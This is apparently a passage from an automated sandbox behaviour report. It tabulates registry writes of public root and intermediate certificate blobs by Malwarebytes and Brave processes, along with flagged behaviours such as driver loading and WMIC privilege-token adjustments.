| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE\Blob = 030000000100000014000000f6108407d6f8bb67980cc2e244c2ebae1cef63be2000000001000000f6010000308201f230820178a0030201020213066c9fd7c1bb104c2943e5717b7b2cc81ac10e300a06082a8648ce3d0403033039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412034301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120343076301006072a8648ce3d020106052b8104002203620004d2ab8a374fa3530dfec18a7b4ba87b464b63b062f62d1bdb087121d200e863bd9a27fbf0396e5dea3da5c981aaa35b2098455d16dbfde8106de39ce0e3bd5f8462f3706433a0cb242f70ba88a12aa075f881ae6206c481db396e29b01efa2e5ca3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414d3ecc73a656ecce1da769a56fb9cf3866d57e581300a06082a8648ce3d040303036800306502303a8b21f1bd7e11add0ef58962fd6eb9d7e908d2bcf6655c32ce328a9700a470ef0375912ff2d9994284e2a4f354d335a023100ea75004e3bc43a941291c958469d211372a7889c8ae44c4adb96d4ac8b6b6b49125333add7e4be24fcb50a76d4a5bc10 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\5A8CEF45D7A69859767A8C8B4496B578CF474B1A\Blob = 0300000001000000140000005a8cef45d7a69859767a8c8b4496b578cf474b1a2000000001000000450500003082054130820329a0030201020213066c9fd29635869f0a0fe58678f85b26bb8a37300d06092a864886f70d01010c05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412032301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203230820222300d06092a864886f70d01010105000382020f003082020a0282020100ad969f2d9c4a4c4a81795199ec8acb6b605113bc4d6d06fcb0088ddd19106ac7260c35d8c06f2084e994b19b8503c35bdb4ae8c8f89076d95b4fe34ce806364dcc9aac3d0c902b92d4061960ac374479858182ad5a37e00dcc9da64c5276ea439db704d150f655e0d5d2a64985e937e9ca7eae5c954d489a3fae205a6d8895d934b8521a4390b0bf6c05b9b678b7ead0e43a3c125362ff4af27bbe3505a91234e3f36474622c3d00495a28fe3244bb87dd652702713bda4af71fdacdf72155904f0fecae82e19f6bd945d3bbf05f87ed3c2c3986da3fdeec7255eb79a3addbdd7cb0ba1ccefcde4f3576cf0ff8781f6a36514627615be99ecff0a2557d7c258a6f2fb4c5cf842e2bfd0d51106cfb5f1bbc1b7ec5ae3b98013192ff0b57f49ab2b957e9abef0d76d1f0eef4ce86a7e06ee9b469a1df69f633c6692e97139ea587b057108137c953b3bb7ff692d19cd018f4926eda834fa663994ca5fb5eef21647a205f6c648515cb37e9620c0b2a16dc012e32da3e4bf59e3af6174094ef9e910886fabe63a85a33eccb744395f96c695236c7296ffc55035c1ffb9fbd47ebe74947950b4e89220949e0f5611ef1bf2e8a726e8059ff573af97532a34e5feced2862d94d73f2cc811760edcdebdcdba7cac57e02bdf2540854fdb42d092c17544a98d154e1516708d2ed6e7e6f3fd22d81592966cb903995111e7427feddebaf0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414b00cf04c30f405580248fd33e552af4b84e36652300d06092a864886f70d01010c05000382020100aaa8808f0e78a3e0a2d4cde6f5987a3bea0003b0970e93bc5aa8f62c8c7287a9b1fc7f73fd637178a58759cf30e10d10b2135a6d82f56ae6809fa0050b68e4476bc76adfb6fd773272e518fa09f4a0932c5dd28c75857665900c0379b7312363ad788309866884cafff9cf269a9279e7cd4bc5e761a717cbf3a91293936ba7e82f5392c46058b0cc0251185b858d625963b6adb4de9afb26f70027c05d55377499c9507fe3592e44e32c25eeec4c3277b49f1ae94b5d20c5dafd1c8716c643e8d4bb269a45705ea90b3753e2467b27fde046f289b7cc42b6cb28266ed9a5c93ac8411360f7508c15aeb26d1a151a5778e6922ad96590823f6c02afae123a27963604d71da28063a99bf1e5bab47c14b04ec9b11f745f38f651ea9bfa2ca211d4a92d271a45b1afb24e710dc05846d66906cb53cbb3fe6b41cd417e7d4c0f7c72797a59cd5e4a0eac9ba99873797cb4f4ccb9b8070cb2745cb8c76f88a190a7f4aaf9bf673af41a15621eb79fbe3db129af67a112f25810195303301bb81a89f69cbd97038ea309f31d8b21f1b4dfe41cd19f650206ea5cd613b384efa2a55c8c7729a768c06bae40d2a8b4eacdf08d4b389c199a1b2854b88990efca75813e1ef26424c718af4eff479e07f63565a4d30a56fff517646cefa822254993b6df0017da587e5deec51bb0d1d15f2110c7f9f3ba020a2707c5f1d6c7d3e0fb09606c | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E\Blob = 0300000001000000140000000d44dd8c3c8c1a1a58756481e90f2e2affb3d26e2000000001000000ba010000308201b63082015ba0030201020213066c9fd5749736663f3b0b9ad9e89e7603f24a300a06082a8648ce3d0403023039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412033301e170d3135303532363030303030305a170d3430303532363030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f7420434120333059301306072a8648ce3d020106082a8648ce3d030107034200042997a7c6417fc00d9be8011b56c6f252a5ba2db212e8d22ed7fac9c5d8aa6d1f73813b3b986b397c33a5c54e868e8017686245577d44581db337e56708eb66dea3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414abb6dbd7069e37ac3086079170c79cc419b178c0300a06082a8648ce3d0403020349003046022100e08592a317b78df92b06a593ac1a98686172fae1a1d0fb1c7860a64399c5b8c40221009c02eff1949cb396f9ebc62af8b62cfe3a901416d78c6324481cdf307dd5683b | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F6108407D6F8BB67980CC2E244C2EBAE1CEF63BE | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2\Blob = 030000000100000014000000f40042e2e5f7e8ef8189fed15519aece42c3bfa22000000001000000d0050000308205cc308203b4a00302010202105498d2d1d45b1995481379c811c08799300d06092a864886f70d01010c05003077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f726974792032303230301e170d3230303431363138333631365a170d3435303431363138343434305a3077310b3009060355040613025553311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e314830460603550403133f4d6963726f736f6674204964656e7469747920566572696669636174696f6e20526f6f7420436572746966696361746520417574686f72697479203230323030820222300d06092a864886f70d01010105000382020f003082020a0282020100b3912a07830667fd9e9de0c7c0b7a4e642047f0fa6db5ffbd55ad745a0fb770bf080f3a66d5a4d7953d8a08684574520c7a254fbc7a2bf8ac76e35f3a215c42f4ee34a8596490dffbe99d814f6bc2707ee429b2bf50b9206e4fd691365a89172f29884eb833d0ee4d771124821cb0dedf64749b79bf9c9c717b6844fffb8ac9ad773674985e386bd3740d02586d4deb5c26d626ad5a978bc2d6f49f9e56c1414fd14c7d3651637decb6ebc5e298dfd629b152cd605e6b9893233a362c7d7d6526708c42ef4562b9e0b87cceca7b4a6aaeb05cd1957a53a0b04271c91679e2d622d2f1ebedac020cb0419ca33fb89be98e272a07235be79e19c836fe46d176f90f33d008675388ed0e0499abbdbd3f830cad55788684d72d3bf6d7f71d8fdbd0dae926448b75b6f7926b5cd9b952184d1ef0f323d7b578cf345074c7ce05e180e35768b6d9ecb3674ab05f8e0735d3256946797250ac6353d9497e7c1448b80fdc1f8f47419e530f606fb21573e061c8b6b158627497b8293ca59e87547e83f38f4c75379a0b6b4e25c51efbd5f38c113e6780c955a2ec5405928cc0f24c0ecba0977239938a6b61cdac7ba20b6d737d87f37af08e33b71db6e731b7d9972b0e486335974b516007b506dc68613dafdc439823d24009a60daba94c005512c34ac50991387bbb30580b24d30025cb826835db46373efae23954f6028be37d55ba50203010001a3543052300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414c87ed26a852a1bca1998040727cf50104f68a8a2301006092b06010401823715010403020100300d06092a864886f70d01010c05000382020100af6adde619e72d9443194ecbe9509564a50391028be236803b15a252c21619b66a5a5d744330f49bff607409b1211e90166dc5248f5c668863f44fcc7df2124c40108b019fdaa9c8aef2951bcf9d05eb493e74a0685be5562c651c827e53da56d94617799245c4103608522917cb2fa6f27ed469248a1e8fb0730dcc1c4aabb2aaeda79163016422a832b87e3228b367732d91b4dc31010bf7470aa6f1d74aed5660c42c08a37b40b0bc74275287d6be88dd378a896e67881df5c95da0feb6ab3a80d71a973c173622411eac4dd583e63c38bd4f30e954a9d3b604c3327661bbb018c52b18b3c080d5b795b05e514d22fcec58aae8d894b4a52eed92dee7187c2157dd5563f7bf6dcd1fd2a6772870c7e25b3a5b08d25b4ec80096b3e18336af860a655c74f6eaec7a6a74a0f04beeef94a3ac50f287edd73a3083c9fb7d57bee5e3f841cae564aeb3a3ec58ec859accefb9eaf35618b95c739aafc577178359db371a187254a541d2b62375a3439ae5777c9679b7418dbfecdc80a09fd17775585f3513e0251a670b7dce25fa070ae46121d8d41ce507c63699f496d0c615fe4ecdd7ae8b9ddb16fd04c692bdd488e6a9a3aabbf764383b5fcc0cd035be741903a6c5aa4ca26136823e1df32bbc975ddb4b783b2df53bef6023e8f5ec0b233695af9866bf53d37bb8694a2a966669c494c6f45f6eac98788880065ca2b2eda2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\0D44DD8C3C8C1A1A58756481E90F2E2AFFB3D26E | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\2AD974A775F73CBDBBD8F5AC3A49255FA8FB1F8C\Blob = 0300000001000000140000002ad974a775f73cbdbbd8f5ac3a49255fa8fb1f8c2000000001000000620400003082045e30820346a0030201020213077312380b9d6688a33b1ed9bf9ccda68e0e0f300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3232303832333232323132385a170d3330303832333232323132385a303c310b3009060355040613025553310f300d060355040a1306416d617a6f6e311c301a06035504031313416d617a6f6e205253412032303438204d303130820122300d06092a864886f70d01010105000382010f003082010a0282010100eb712ca9cb1f8828923230af8a570f78b73725955587ac675c97d322c8daa214676b7cf067dae2032ab356125dc6b547f96708a7937a9592180fb4f9f910369a7f2f80b64fba134ec75d531ee0dd96330720d396bc12e4745042a1051373b54f9b4424fe2d7fedbc2285ec362133977506ce271882dce3d9c582078d5e26012626671fd93f13cf32ba6bad7864fcaaff0e023c07df9c0578728cfdea75b7032884dae86e078cd05085ef8154b2716eec6d62ef8f94c35ee9c4a4d091c02e249198caeeba258ed4f671b6fb5b6b38064837478d86dcf2ea06fb76377d9eff424e4d588293cfe271c278b17aab4b5b94378881e4d9af24aef872c565fb4bb451e70203010001a382015a3082015630120603551d130101ff040830060101ff020100300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302301d0603551d0e0416041481b80e638a891218e5fa3b3b50959fe6e5901385301f0603551d230418301680148418cc8534ecbc0c94942e08599cc7b2104e0a08307b06082b06010505070101046f306d302f06082b060105050730018623687474703a2f2f6f6373702e726f6f746361312e616d617a6f6e74727573742e636f6d303a06082b06010505073002862e687474703a2f2f6372742e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e636572303f0603551d1f043830363034a032a030862e687474703a2f2f63726c2e726f6f746361312e616d617a6f6e74727573742e636f6d2f726f6f746361312e63726c30130603551d20040c300a3008060667810c010201300d06092a864886f70d01010b05000382010100ad00de0205232e063262b46bb19416e41140de2bfa59c135efe0aa8f2b41b9d1f38739001df23db5a7470c0606c691f3075702d4edbd17c1909abf4875a2074f30dd4a6a42b50d3d15c00ffe845bc63c99cc5752b1d86e12d59692934b94e507e88982086a7a34d49e64e13d876a92909a63a14bf88fb6ea34d305be20c2de06e28c9f738b9f4d3985cace19369d85c99ec9f8503fb67e88a1efca84068b50b40a5ca61c44f1fdc8614060f26125aa07f4c7c27375e40c0b428d04e55f4448995b7b898196a7889d4b0d62e804c4d7feb4e8b26dcaecc01cbc385b1ddf85ce5b7ae3494b6cb9a7ddf405b249ade1c5146bc2ccebcd7fd65869bac3207e7fb0b8 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8DA7F965EC5EFC37910F1C6E59FDC1CC6A6EDE16\Blob = 0300000001000000140000008da7f965ec5efc37910f1c6e59fdc1cc6a6ede162000000001000000450300003082034130820229a0030201020213066c9fcf99bf8c0a39e2f0788a43e696365bca300d06092a864886f70d01010b05003039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f742043412031301e170d3135303532363030303030305a170d3338303131373030303030305a3039310b3009060355040613025553310f300d060355040a1306416d617a6f6e3119301706035504031310416d617a6f6e20526f6f74204341203130820122300d06092a864886f70d01010105000382010f003082010a0282010100b2788071ca78d5e371af478050747d6ed8d78876f49968f7582160f97484012fac022d86d3a0437a4eb2a4d036ba01be8ddb48c80717364cf4ee8823c73eeb37f5b519f84968b0ded7b976381d619ea4fe8236a5e54a56e445e1f9fdb416fa74da9c9b35392ffab02050066c7ad080b2a6f9afec47198f503807dca2873958f8bad5a9f948673096ee94785e6f89a351c0308666a14566ba54eba3c391f948dcffd1e8302d7d2d747035d78824f79ec4596ebb738717f2324628b843fab71daacab4f29f240e2d4bf7715c5e69ffea9502cb388aae50386fdbfb2d621bc5c71e54e177e067c80f9c8723d63f40207f2080c4804c3e3b24268e04ae6c9ac8aa0d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604148418cc8534ecbc0c94942e08599cc7b2104e0a08300d06092a864886f70d01010b0500038201010098f2375a4190a11ac57651282036230eaee628bbaaf894ae48a4307f1bfc248d4bb4c8a197f6b6f17a70c85393cc0828e39825cf23a4f9de21d37c8509ad4e9a753ac20b6a897876444718656c8d418e3b7f9acbf4b5a750d7052c37e8034bade961a0026ef5f2f0c5b2ed5bb7dcfa945c779e13a57f52ad95f2f8933bde8b5c5bca5a525b60af14f74befa3fb9f40956d3154fc42d3c7461f23add90f48709ad9757871d1724334756e5759c2025c266029cf2319168e8843a5d4e4cb08fb231143e843297262a1a95d5e08d490aeb8d8ce14c2d055f286f6c49343776661c0b9e841d7977860036e4a72aea5d17dba109e866c1b8ab95933f8ebc490bef1b9 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 5c0000000100000004000000001000000400000001000000100000001bfe69d191b71933a372a80fe155e5b50300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e0b00000001000000100000005300650063007400690067006f0000001d0000000100000010000000885010358d29a38f059b028559c95f901400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd253000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e2000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\1C58A3A8518E8759BF075B76B750D4F2DF264FCD\Blob = 0300000001000000140000001c58a3a8518e8759bf075b76b750d4f2df264fcd2000000001000000c2040000308204be308203a6a003020102021006d8d904d5584346f68a2fa754227ec4300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3231303431343030303030305a170d3331303431333233353935395a304f310b300906035504061302555331153013060355040a130c446967694365727420496e633129302706035504031320446967694365727420544c53205253412053484132353620323032302043413130820122300d06092a864886f70d01010105000382010f003082010a0282010100c14bb3654770bcdd4f58dbec9cedc366e51f311354ad4a66461f2c0aec6407e52edcdcb90a20eddfe3c4d09e9aa97a1d8288e51156db1e9f58c251e72c340d2ed292e156cbf1795fb3bb87ca25037b9a52416610604f571349f0e8376783dfe7d34b674c2251a6df0e9910ed57517426e27dc7ca622e131b7f238825536fc13458008b84fff8bea75849227b96ada2889b15bca07cdfe951a8d5b0ed37e236b4824b62b5499aecc767d6e33ef5e3d6125e44f1bf71427d58840380b18101faf9ca32bbb48e278727c52b74d4a8d697dec364f9cace53a256bc78178e490329aefb494fa415b9cef25c19576d6b79a72ba2272013b5d03d40d321300793ea99f50203010001a38201823082017e30120603551d130101ff040830060101ff020100301d0603551d0e04160414b76ba2eaa8aa848c79eab4da0f98b2c59576b9f4301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300e0603551d0f0101ff040403020186301d0603551d250416301406082b0601050507030106082b06010505070302307606082b06010505070101046a3068302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304006082b060105050730028634687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63727430420603551d1f043b30393037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4469676943657274476c6f62616c526f6f7443412e63726c303d0603551d2004363034300b06096086480186fd6c02013007060567810c01013008060667810c0102013008060667810c0102023008060667810c010203300d06092a864886f70d01010b050003820101008032ce5e0bdd6e5a0d0aafe1d684cbc08efa8570edda5db30cf72b7540fe850afaf33178b7704b1a8958ba80bdf36b1de97ecf0bba589c59d490d3fd6cfdd0986db771825bcf6d0b5a09d07bdec443d82aa4de9e41265fbb8f99cbddaee1a86f9f87fe74b71f1b20abb14fc6f5675d5d9b3ce9ff69f7616cd6d9f3fd36c6ab038876d24b2e7586e3fcd8557d26c21177df3e02b67cf3ab7b7a86366fb8f7d89371cf86df7330fa7babed2a59c842843b11171a52f3c90e147da25b7267ba71ed574766c5b8024a65345e8bd02a3c209c51994ce7529ef76b112b0d927e1de88aeb36164387ea2a63bf753febdec403bb0a3cf730efebaf4cfc8b3610733ef3a4 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F40042E2E5F7E8EF8189FED15519AECE42C3BFA2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
